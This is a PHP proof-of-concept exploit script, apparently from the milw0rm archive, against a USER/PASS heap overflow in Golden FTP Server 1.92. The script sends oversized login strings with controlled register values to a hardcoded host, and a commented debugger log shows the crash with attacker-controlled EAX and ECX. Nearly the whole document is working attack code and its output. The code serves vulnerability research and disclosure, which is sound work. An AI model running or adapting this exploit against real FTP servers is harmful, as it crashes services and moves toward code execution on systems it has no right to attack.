<?php
#23.07 03/12/2006
#Golden FTP server 1.92 (freeware edition) USER/PASS heap based overflow poc
#by rgod retrog at alice dot it
#site: http://retrogod.altervista.org
#download link: http://www.download.com/3000-2160_4-10375602.html?tag=sd.EXAF
$host="192.168.1.3";
$port="21";
$junk="";
for ($i=1; $i<=8095; $i++){
$junk.="a";
}
$eax="AAAA";
$eax[0]=chr(ord($eax)-20); //to have the wanted eax
$ecx="BBBB";
$junk.=$ecx.$eax;
$sock=@fsockopen($host,$port,$errno, $errstr, 10);
if (!$sock){
die("\nnot connected!\n");
}
else {
fgets($sock,80);
fputs($sock,"USER ".$junk."\r\n");
fgets($sock,80);
fputs($sock,"PASS ".$junk."\r\n");
fclose($sock);
}
/*
...
17:07:28.144 pid=0870 tid=1128 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00EBFD64: C4 9D A6 00 F4 BF A5 00-00 9F A6 00 BC FD EB 00
ESP=00EBFD1C: 00 00 00 00 58 FD EB 00-61 24 41 00 80 9F A6 00
EBP=00EBFD20: 58 FD EB 00 61 24 41 00-80 9F A6 00 F4 BF A5 00
ESI=004B9F04: 2D 41 41 41 00 00 00 00-00 00 00 00 00 00 00 00
EDI=004B9F00: 42 42 42 42 2D 41 41 41-00 00 00 00 00 00 00 00
EIP=004A9B74: 8B 00 8B 12 E8 5F F6 FD-FF 0F 94 C0 83 E0 01 5B
--> MOV EAX,[EAX]
----------------------------------------------------------------
17:07:28.254 pid=0870 tid=1128 Thread exited with code 0
...
*/
?>
# milw0rm.com [2006-12-11]